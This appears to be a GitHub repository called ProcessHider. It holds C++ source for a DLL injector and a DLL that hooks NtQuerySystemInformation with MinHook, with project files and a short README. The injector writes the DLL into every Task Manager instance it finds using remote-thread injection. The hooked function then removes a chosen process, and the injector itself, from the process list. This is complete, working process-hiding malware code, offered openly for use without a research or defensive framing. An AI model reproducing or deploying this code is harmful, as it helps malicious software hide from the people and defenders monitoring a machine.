├── DLL_Injector
├── .gitignore
├── DLL_Injector.vcxproj
├── DLL_Injector.vcxproj.filters
├── DLL_Injector.vcxproj.user
└── main.cpp
├── ProcessHider.sln
├── ProcessHider
├── .gitignore
├── ProcessHider.vcxproj
├── ProcessHider.vcxproj.filters
├── ProcessHider.vcxproj.user
├── main.cpp
└── nt_structs.h
├── README.md
└── include
├── .gitattributes
├── MinHook.h
└── libMinHook.x64.lib
/DLL_Injector/.gitignore:
--------------------------------------------------------------------------------
1 | /Debug
2 | /Release
3 | /x64
--------------------------------------------------------------------------------
/DLL_Injector/DLL_Injector.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}
23 | Win32Proj
24 | DLL_Injector
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 |
81 |
82 | false
83 |
84 |
85 |
86 |
87 |
88 | Level3
89 | Disabled
90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
91 | true
92 |
93 |
94 | Console
95 | true
96 |
97 |
98 |
99 |
100 |
101 |
102 | Level3
103 | Disabled
104 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
105 | true
106 |
107 |
108 | Console
109 | true
110 |
111 |
112 |
113 |
114 | Level3
115 |
116 |
117 | MaxSpeed
118 | true
119 | true
120 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
121 | true
122 |
123 |
124 | Console
125 | true
126 | true
127 | true
128 |
129 |
130 |
131 |
132 | Level3
133 |
134 |
135 | MaxSpeed
136 | true
137 | true
138 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
139 | true
140 |
141 |
142 | Console
143 | true
144 | true
145 | true
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
--------------------------------------------------------------------------------
/DLL_Injector/DLL_Injector.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/DLL_Injector/DLL_Injector.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/DLL_Injector/main.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 |
6 | using namespace std;
7 | HANDLE map;
8 | LPVOID buf;
9 |
10 | bool inject_dll(DWORD pid, string dll_path) {
11 |
12 | HANDLE handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
13 | if (handle == INVALID_HANDLE_VALUE) {
14 | cout << " [-] Open Process Failed" << endl;
15 | return false;
16 | }
17 | else { cout << " [+] Got a Handle to the Remote Process" << endl; }
18 |
19 | LPVOID address = VirtualAllocEx(handle, NULL, dll_path.length() , MEM_COMMIT | MEM_RESERVE,
20 | PAGE_EXECUTE_READWRITE);
21 | if (address == NULL) {
22 | cout << " [-] VirtualAllocEx Failed" << endl;
23 | return false;
24 | }
25 |
26 | bool res = WriteProcessMemory(handle, address, dll_path.c_str(), dll_path.length(), 0);
27 | if (!res) {
28 | cout << " [-] WriteProcessMemory Failed" << endl;
29 | }
30 | if (CreateRemoteThread(handle, NULL, NULL, (LPTHREAD_START_ROUTINE)LoadLibraryA, (LPVOID)address, NULL, NULL) == INVALID_HANDLE_VALUE) {
31 | cout << " [-] CreateRemoteThread Failed" << endl;
32 | }
33 | else { cout << " [+] DLL Loaded Into Remote Process" << endl; }
34 |
35 | cout << " [+] Process Hidden" << endl << endl;
36 | CloseHandle(handle);
37 | return true;
38 | }
39 |
40 | void find_and_inject()
41 | {
42 | char* dll_path_c = (char*)malloc(sizeof(char) * 3000);
43 | GetModuleFileNameA(NULL, dll_path_c, 3000);
44 |
45 | DWORD lastpid = 4;
46 | string dll_path(dll_path_c);
47 | size_t index = dll_path.find_last_of('\\');
48 | dll_path.erase(dll_path.begin() + index, dll_path.end());
49 | dll_path.append("\\ProcessHider.dll");
50 |
51 | while (true) { // Keep running to check if TM closes and reopens, if yes then inject again
52 | PROCESSENTRY32 process;
53 | process.dwSize = sizeof(PROCESSENTRY32);
54 |
55 | HANDLE proc_snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
56 | if (proc_snap == INVALID_HANDLE_VALUE) {
57 | cout << " [-] CreateToolhelp32Snapshot Failed" << endl;
58 | return;
59 | }
60 |
61 | if (!Process32First(proc_snap, &process)) {
62 | cout << " [-] Process32First Failed" << endl;
63 | return;
64 | }
65 |
66 | do
67 | {
68 | if (!lstrcmp(process.szExeFile, L"Taskmgr.exe") && lastpid != process.th32ProcessID) {
69 | cout << " [+] Task Manager Detected" << endl;
70 | if (!inject_dll(process.th32ProcessID, dll_path)) {
71 | cout << " [-] Unable to Inject DLL!! Check if you are running as Admin" << endl << endl;
72 | break;
73 | }
74 | lastpid = process.th32ProcessID;
75 | }
76 | } while (Process32Next(proc_snap, &process));
77 | CloseHandle(proc_snap);
78 | Sleep(1000);
79 | }
80 | }
81 |
82 | bool map_process_name(string process) {
83 | map = CreateFileMappingA(
84 | INVALID_HANDLE_VALUE,
85 | NULL,
86 | PAGE_READWRITE,
87 | 0,
88 | 255,
89 | "Global\\GetProcessName"
90 | );
91 |
92 | if (map == NULL) {
93 | cout << "CreateFileMapping Failed" << endl;
94 | return false;
95 | }
96 |
97 | buf = MapViewOfFile(map,
98 | FILE_MAP_ALL_ACCESS,
99 | 0,
100 | 0,
101 | 255);
102 |
103 | if (buf == NULL) {
104 | cout << "MapViewOfFile Failed" << endl;
105 | CloseHandle(map);
106 | return 0;
107 | }
108 |
109 | CopyMemory(buf, process.c_str(), process.length());
110 | }
111 |
112 | int main()
113 | {
114 | string process, inp;
115 | cout << " Enter Process Name To Hide" << endl << "--> ";
116 | cin >> process;
117 | cout << endl;
118 | map_process_name(process);
119 |
120 | CreateThread(
121 | NULL,
122 | NULL,
123 | (LPTHREAD_START_ROUTINE)find_and_inject,
124 | NULL,
125 | NULL,
126 | NULL
127 | );
128 |
129 | cout << "Enter \"quit\" to Quit or Keep this running to inject into future task manager processes" << endl << endl;
130 | while (true) {
131 | cin >> inp;
132 | if (inp == "quit") {
133 | UnmapViewOfFile(buf);
134 | CloseHandle(map);
135 | ExitProcess(0);
136 | }
137 | }
138 |
139 | return 0;
140 | }
--------------------------------------------------------------------------------
/ProcessHider.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 14
4 | VisualStudioVersion = 14.0.25420.1
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ProcessHider", "ProcessHider\ProcessHider.vcxproj", "{EE6E876F-F989-4AC2-BA2F-55348E03519C}"
7 | EndProject
8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DLL_Injector", "DLL_Injector\DLL_Injector.vcxproj", "{8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}"
9 | EndProject
10 | Global
11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
12 | Debug|x64 = Debug|x64
13 | Debug|x86 = Debug|x86
14 | Release|x64 = Release|x64
15 | Release|x86 = Release|x86
16 | EndGlobalSection
17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
18 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Debug|x64.ActiveCfg = Debug|x64
19 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Debug|x64.Build.0 = Debug|x64
20 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Debug|x86.ActiveCfg = Debug|Win32
21 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Debug|x86.Build.0 = Debug|Win32
22 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Release|x64.ActiveCfg = Release|x64
23 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Release|x64.Build.0 = Release|x64
24 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Release|x86.ActiveCfg = Release|Win32
25 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}.Release|x86.Build.0 = Release|Win32
26 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Debug|x64.ActiveCfg = Debug|x64
27 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Debug|x64.Build.0 = Debug|x64
28 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Debug|x86.ActiveCfg = Debug|Win32
29 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Debug|x86.Build.0 = Debug|Win32
30 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Release|x64.ActiveCfg = Release|x64
31 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Release|x64.Build.0 = Release|x64
32 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Release|x86.ActiveCfg = Release|Win32
33 | {8C2B26CA-DA93-4F3B-975C-9B1CFE8B2CC5}.Release|x86.Build.0 = Release|Win32
34 | EndGlobalSection
35 | GlobalSection(SolutionProperties) = preSolution
36 | HideSolutionNode = FALSE
37 | EndGlobalSection
38 | EndGlobal
39 |
--------------------------------------------------------------------------------
/ProcessHider/.gitignore:
--------------------------------------------------------------------------------
1 | /Debug
2 | /Release
3 | /x64
--------------------------------------------------------------------------------
/ProcessHider/ProcessHider.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {EE6E876F-F989-4AC2-BA2F-55348E03519C}
23 | Win32Proj
24 | ProcessHider
25 | 8.1
26 |
27 |
28 |
29 | DynamicLibrary
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | DynamicLibrary
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | DynamicLibrary
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | DynamicLibrary
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 |
81 |
82 | false
83 |
84 |
85 |
86 |
87 |
88 | Level3
89 | Disabled
90 | WIN32;_DEBUG;_WINDOWS;_USRDLL;PROCESSHIDER_EXPORTS;%(PreprocessorDefinitions)
91 | true
92 |
93 |
94 | Windows
95 | true
96 |
97 |
98 |
99 |
100 |
101 |
102 | Level3
103 | Disabled
104 | _DEBUG;_WINDOWS;_USRDLL;PROCESSHIDER_EXPORTS;%(PreprocessorDefinitions)
105 | true
106 |
107 |
108 | Windows
109 | true
110 |
111 |
112 |
113 |
114 | Level3
115 |
116 |
117 | MaxSpeed
118 | true
119 | true
120 | WIN32;NDEBUG;_WINDOWS;_USRDLL;PROCESSHIDER_EXPORTS;%(PreprocessorDefinitions)
121 | true
122 |
123 |
124 | Windows
125 | true
126 | true
127 | true
128 |
129 |
130 |
131 |
132 | Level3
133 |
134 |
135 | MaxSpeed
136 | true
137 | true
138 | NDEBUG;_WINDOWS;_USRDLL;PROCESSHIDER_EXPORTS;%(PreprocessorDefinitions)
139 | true
140 | MultiThreaded
141 |
142 |
143 | Windows
144 | true
145 | true
146 | true
147 | ../include/libMinHook.x64.lib;%(AdditionalDependencies)
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
--------------------------------------------------------------------------------
/ProcessHider/ProcessHider.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Source Files
25 |
26 |
27 |
--------------------------------------------------------------------------------
/ProcessHider/ProcessHider.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/ProcessHider/main.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include "..\include\MinHook.h"
3 | #include "nt_structs.h"
4 |
5 | #pragma comment(lib, "libMinHook.x64.lib")
6 |
7 | PNT_QUERY_SYSTEM_INFORMATION Original_NtQuerySystemInformation;
8 | PNT_QUERY_SYSTEM_INFORMATION New_NtQuerySystemInformation;
9 | wchar_t* process;
10 |
11 | NTSTATUS WINAPI Hooked_NtQuerySystemInformation(
12 | SYSTEM_INFORMATION_CLASS SystemInformationClass,
13 | PVOID SystemInformation,
14 | ULONG SystemInformationLength,
15 | PULONG ReturnLength)
16 | {
17 | NTSTATUS stat = New_NtQuerySystemInformation(
18 | SystemInformationClass,
19 | SystemInformation,
20 | SystemInformationLength,
21 | ReturnLength);
22 |
23 | if (SystemProcessInformation == SystemInformationClass && stat == 0)
24 | {
25 | P_SYSTEM_PROCESS_INFORMATION prev = P_SYSTEM_PROCESS_INFORMATION(SystemInformation);
26 | P_SYSTEM_PROCESS_INFORMATION curr = P_SYSTEM_PROCESS_INFORMATION((PUCHAR)prev + prev->NextEntryOffset);
27 |
28 | while (prev->NextEntryOffset != NULL) {
29 | if (!lstrcmp(curr->ImageName.Buffer, process)) {
30 | if (curr->NextEntryOffset == 0) {
31 | prev->NextEntryOffset = 0; // if above process is at last
32 | }
33 | else {
34 | prev->NextEntryOffset += curr->NextEntryOffset;
35 | }
36 | curr = prev;
37 | }
38 | if (!lstrcmp(curr->ImageName.Buffer, L"DLL_Injector.exe")) {
39 | if (curr->NextEntryOffset == 0) {
40 | prev->NextEntryOffset = 0;
41 | }
42 | else {
43 | prev->NextEntryOffset += curr->NextEntryOffset;
44 | }
45 | curr = prev;
46 | }
47 | prev = curr;
48 | curr = P_SYSTEM_PROCESS_INFORMATION((PUCHAR)curr + curr->NextEntryOffset);
49 | }
50 | }
51 |
52 | return stat;
53 | }
54 |
55 | bool set_nt_hook()
56 | {
57 | HMODULE ntdll = GetModuleHandle(L"ntdll.dll");
58 |
59 | Original_NtQuerySystemInformation = (PNT_QUERY_SYSTEM_INFORMATION)GetProcAddress(ntdll, "NtQuerySystemInformation");
60 |
61 | if (MH_Initialize() != MH_OK) { return false; }
62 |
63 | if(MH_CreateHook(Original_NtQuerySystemInformation, &Hooked_NtQuerySystemInformation,
64 | (LPVOID*) &New_NtQuerySystemInformation) != MH_OK) { return false; }
65 |
66 | if (MH_EnableHook(Original_NtQuerySystemInformation) != MH_OK) { return false; }
67 |
68 | return true;
69 | }
70 |
71 | void get_process_name() {
72 | HANDLE map = OpenFileMappingA(
73 | FILE_MAP_ALL_ACCESS,
74 | FALSE,
75 | "Global\\GetProcessName"
76 | );
77 |
78 | LPVOID buf = MapViewOfFile(map, // handle to map object
79 | FILE_MAP_ALL_ACCESS, // read/write permission
80 | 0,
81 | 0,
82 | 255);
83 |
84 | process = (wchar_t*)malloc(255 * sizeof(wchar_t));
85 | MultiByteToWideChar(CP_UTF8, 0, (char*)buf, -1, process, 255);
86 |
87 | UnmapViewOfFile(buf);
88 | CloseHandle(map);
89 | }
90 |
91 | BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
92 | {
93 | switch(fdwReason)
94 | {
95 | case DLL_PROCESS_ATTACH:
96 | if (!set_nt_hook()) {
97 | return FALSE;
98 | }
99 | get_process_name();
100 | break;
101 | case DLL_PROCESS_DETACH:
102 | MH_DisableHook(Original_NtQuerySystemInformation);
103 | MH_Uninitialize();
104 | break;
105 | }
106 |
107 | return TRUE;
108 | }
--------------------------------------------------------------------------------
/ProcessHider/nt_structs.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 |
4 | typedef NTSTATUS(WINAPI *PNT_QUERY_SYSTEM_INFORMATION)(
5 | SYSTEM_INFORMATION_CLASS SystemInformationClass,
6 | PVOID SystemInformation,
7 | ULONG SystemInformationLength,
8 | PULONG ReturnLength
9 | );
10 |
11 | typedef struct __SYSTEM_PROCESS_INFORMATION {
12 | ULONG NextEntryOffset;
13 | ULONG NumberOfThreads;
14 | LARGE_INTEGER WorkingSetPrivateSize;
15 | ULONG HardFaultCount;
16 | ULONG NumberOfThreadsHighWatermark;
17 | ULONGLONG CycleTime;
18 | LARGE_INTEGER CreateTime;
19 | LARGE_INTEGER UserTime;
20 | LARGE_INTEGER KernelTime;
21 | UNICODE_STRING ImageName;
22 | LONG BasePriority;
23 | PVOID UniqueProcessId;
24 | PVOID InheritedFromUniqueProcessId;
25 | ULONG HandleCount;
26 | ULONG SessionId;
27 | ULONG_PTR UniqueProcessKey;
28 | ULONG_PTR PeakVirtualSize;
29 | ULONG_PTR VirtualSize;
30 | ULONG PageFaultCount;
31 | ULONG_PTR PeakWorkingSetSize;
32 | ULONG_PTR WorkingSetSize;
33 | ULONG_PTR QuotaPeakPagedPoolUsage;
34 | ULONG_PTR QuotaPagedPoolUsage;
35 | ULONG_PTR QuotaPeakNonPagedPoolUsage;
36 | ULONG_PTR QuotaNonPagedPoolUsage;
37 | ULONG_PTR PagefileUsage;
38 | ULONG_PTR PeakPagefileUsage;
39 | ULONG_PTR PrivatePageCount;
40 | LARGE_INTEGER ReadOperationCount;
41 | LARGE_INTEGER WriteOperationCount;
42 | LARGE_INTEGER OtherOperationCount;
43 | LARGE_INTEGER ReadTransferCount;
44 | LARGE_INTEGER WriteTransferCount;
45 | LARGE_INTEGER OtherTransferCount;
46 | } S_SYSTEM_PROCESS_INFORMATION, *P_SYSTEM_PROCESS_INFORMATION;
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # ProcessHider
2 |
3 | Process Hider uses Windows API Hooking to Hide a Process from TaskManager. It utilises Minhook Library to hook NtQuerySystemInformation function so whenever NtQuerySystemInformation is called our function executes which removes the chosen process from Process List returned by the original function.
4 |
5 | There are 2 projects inside the repo, the main one is ProcessHider which produces the DLL that is injected inside Task Manager. The second one is the DLL injector whose main job is to inject the DLL and pass the name of the process to hide.
6 |
7 | ## To Compile:
8 | ``` Clone the repo and open the solution file in Visual Studio```
9 |
--------------------------------------------------------------------------------
/include/.gitattributes:
--------------------------------------------------------------------------------
1 | *.h text
2 | *.lib binary
3 |
--------------------------------------------------------------------------------
/include/MinHook.h:
--------------------------------------------------------------------------------
1 | /*
2 | * MinHook - The Minimalistic API Hooking Library for x64/x86
3 | * Copyright (C) 2009-2017 Tsuda Kageyu.
4 | * All rights reserved.
5 | *
6 | * Redistribution and use in source and binary forms, with or without
7 | * modification, are permitted provided that the following conditions
8 | * are met:
9 | *
10 | * 1. Redistributions of source code must retain the above copyright
11 | * notice, this list of conditions and the following disclaimer.
12 | * 2. Redistributions in binary form must reproduce the above copyright
13 | * notice, this list of conditions and the following disclaimer in the
14 | * documentation and/or other materials provided with the distribution.
15 | *
16 | * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
17 | * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
18 | * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
19 | * PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER
20 | * OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
21 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
22 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
23 | * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
24 | * LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
25 | * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
26 | * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
27 | */
28 |
29 | #pragma once
30 |
31 | #if !(defined _M_IX86) && !(defined _M_X64) && !(defined __i386__) && !(defined __x86_64__)
32 | #error MinHook supports only x86 and x64 systems.
33 | #endif
34 |
35 | #include
36 |
37 | // MinHook Error Codes.
38 | typedef enum MH_STATUS
39 | {
40 | // Unknown error. Should not be returned.
41 | MH_UNKNOWN = -1,
42 |
43 | // Successful.
44 | MH_OK = 0,
45 |
46 | // MinHook is already initialized.
47 | MH_ERROR_ALREADY_INITIALIZED,
48 |
49 | // MinHook is not initialized yet, or already uninitialized.
50 | MH_ERROR_NOT_INITIALIZED,
51 |
52 | // The hook for the specified target function is already created.
53 | MH_ERROR_ALREADY_CREATED,
54 |
55 | // The hook for the specified target function is not created yet.
56 | MH_ERROR_NOT_CREATED,
57 |
58 | // The hook for the specified target function is already enabled.
59 | MH_ERROR_ENABLED,
60 |
61 | // The hook for the specified target function is not enabled yet, or already
62 | // disabled.
63 | MH_ERROR_DISABLED,
64 |
65 | // The specified pointer is invalid. It points the address of non-allocated
66 | // and/or non-executable region.
67 | MH_ERROR_NOT_EXECUTABLE,
68 |
69 | // The specified target function cannot be hooked.
70 | MH_ERROR_UNSUPPORTED_FUNCTION,
71 |
72 | // Failed to allocate memory.
73 | MH_ERROR_MEMORY_ALLOC,
74 |
75 | // Failed to change the memory protection.
76 | MH_ERROR_MEMORY_PROTECT,
77 |
78 | // The specified module is not loaded.
79 | MH_ERROR_MODULE_NOT_FOUND,
80 |
81 | // The specified function is not found.
82 | MH_ERROR_FUNCTION_NOT_FOUND
83 | }
84 | MH_STATUS;
85 |
86 | // Can be passed as a parameter to MH_EnableHook, MH_DisableHook,
87 | // MH_QueueEnableHook or MH_QueueDisableHook.
88 | #define MH_ALL_HOOKS NULL
89 |
90 | #ifdef __cplusplus
91 | extern "C" {
92 | #endif
93 |
94 | // Initialize the MinHook library. You must call this function EXACTLY ONCE
95 | // at the beginning of your program.
96 | MH_STATUS WINAPI MH_Initialize(VOID);
97 |
98 | // Uninitialize the MinHook library. You must call this function EXACTLY
99 | // ONCE at the end of your program.
100 | MH_STATUS WINAPI MH_Uninitialize(VOID);
101 |
102 | // Creates a Hook for the specified target function, in disabled state.
103 | // Parameters:
104 | // pTarget [in] A pointer to the target function, which will be
105 | // overridden by the detour function.
106 | // pDetour [in] A pointer to the detour function, which will override
107 | // the target function.
108 | // ppOriginal [out] A pointer to the trampoline function, which will be
109 | // used to call the original target function.
110 | // This parameter can be NULL.
111 | MH_STATUS WINAPI MH_CreateHook(LPVOID pTarget, LPVOID pDetour, LPVOID *ppOriginal);
112 |
113 | // Creates a Hook for the specified API function, in disabled state.
114 | // Parameters:
115 | // pszModule [in] A pointer to the loaded module name which contains the
116 | // target function.
117 | // pszTarget [in] A pointer to the target function name, which will be
118 | // overridden by the detour function.
119 | // pDetour [in] A pointer to the detour function, which will override
120 | // the target function.
121 | // ppOriginal [out] A pointer to the trampoline function, which will be
122 | // used to call the original target function.
123 | // This parameter can be NULL.
124 | MH_STATUS WINAPI MH_CreateHookApi(
125 | LPCWSTR pszModule, LPCSTR pszProcName, LPVOID pDetour, LPVOID *ppOriginal);
126 |
127 | // Creates a Hook for the specified API function, in disabled state.
128 | // Parameters:
129 | // pszModule [in] A pointer to the loaded module name which contains the
130 | // target function.
131 | // pszTarget [in] A pointer to the target function name, which will be
132 | // overridden by the detour function.
133 | // pDetour [in] A pointer to the detour function, which will override
134 | // the target function.
135 | // ppOriginal [out] A pointer to the trampoline function, which will be
136 | // used to call the original target function.
137 | // This parameter can be NULL.
138 | // ppTarget [out] A pointer to the target function, which will be used
139 | // with other functions.
140 | // This parameter can be NULL.
141 | MH_STATUS WINAPI MH_CreateHookApiEx(
142 | LPCWSTR pszModule, LPCSTR pszProcName, LPVOID pDetour, LPVOID *ppOriginal, LPVOID *ppTarget);
143 |
144 | // Removes an already created hook.
145 | // Parameters:
146 | // pTarget [in] A pointer to the target function.
147 | MH_STATUS WINAPI MH_RemoveHook(LPVOID pTarget);
148 |
149 | // Enables an already created hook.
150 | // Parameters:
151 | // pTarget [in] A pointer to the target function.
152 | // If this parameter is MH_ALL_HOOKS, all created hooks are
153 | // enabled in one go.
154 | MH_STATUS WINAPI MH_EnableHook(LPVOID pTarget);
155 |
156 | // Disables an already created hook.
157 | // Parameters:
158 | // pTarget [in] A pointer to the target function.
159 | // If this parameter is MH_ALL_HOOKS, all created hooks are
160 | // disabled in one go.
161 | MH_STATUS WINAPI MH_DisableHook(LPVOID pTarget);
162 |
163 | // Queues to enable an already created hook.
164 | // Parameters:
165 | // pTarget [in] A pointer to the target function.
166 | // If this parameter is MH_ALL_HOOKS, all created hooks are
167 | // queued to be enabled.
168 | MH_STATUS WINAPI MH_QueueEnableHook(LPVOID pTarget);
169 |
170 | // Queues to disable an already created hook.
171 | // Parameters:
172 | // pTarget [in] A pointer to the target function.
173 | // If this parameter is MH_ALL_HOOKS, all created hooks are
174 | // queued to be disabled.
175 | MH_STATUS WINAPI MH_QueueDisableHook(LPVOID pTarget);
176 |
177 | // Applies all queued changes in one go.
178 | MH_STATUS WINAPI MH_ApplyQueued(VOID);
179 |
180 | // Translates the MH_STATUS to its name as a string.
181 | const char * WINAPI MH_StatusToString(MH_STATUS status);
182 |
183 | #ifdef __cplusplus
184 | }
185 | #endif
186 |
187 |
--------------------------------------------------------------------------------
/include/libMinHook.x64.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kernelm0de/ProcessHider/b9ae6634e8277c152c8e7ac6b867055d0087c977/include/libMinHook.x64.lib
--------------------------------------------------------------------------------